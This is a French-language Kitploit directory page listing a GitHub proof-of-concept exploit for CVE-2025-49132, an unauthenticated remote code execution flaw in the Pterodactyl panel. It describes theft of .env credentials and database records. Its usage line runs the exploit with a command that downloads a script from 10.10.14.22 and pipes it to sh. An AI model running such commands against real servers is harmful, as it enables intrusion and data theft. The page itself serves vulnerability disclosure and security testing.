Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-49132 — La faille permet à un attaquant d'exécuter des commandes système arbitraires sur le serveur hébergeant le panneau Pterodactyl sans aucune authentification préalable. | Kitploit
Outils/GitHubGitHub/4nuxd/cve-2025-49132
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCommandement et ContrôleDéveloppement de Charges Utiles
GitHub4nuxd/cve-2025-49132

CVE-2025-49132

La faille permet à un attaquant d'exécuter des commandes système arbitraires sur le serveur hébergeant le panneau Pterodactyl sans aucune authentification préalable.

Voir le dépôt
il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Impact

En utilisant le fichier /locales/locale.json avec les paramètres de requête locale et namespace, un acteur malveillant peut exécuter du code arbitraire, sans être authentifié.

Avec la capacité d'exécuter du code arbitraire, cette vulnérabilité peut être exploitée d'une infinité de façons. Elle pourrait être utilisée pour obtenir un accès au serveur du Panel, lire les identifiants du fichier de configuration du Panel (.env ou autre), extraire des informations sensibles de la base de données (telles que les détails des utilisateurs [nom d'utilisateur, email, prénom et nom, mot de passe haché, adresses IP, etc.]), accéder aux fichiers des serveurs gérés par le panel, etc.

Comment utiliser

root@kitploit:~

python poc.py --target "pterodactyl.htb" --cmd 'curl http://10.10.14.22:8080/dbs.sh | sh' 

Télécharger l’outil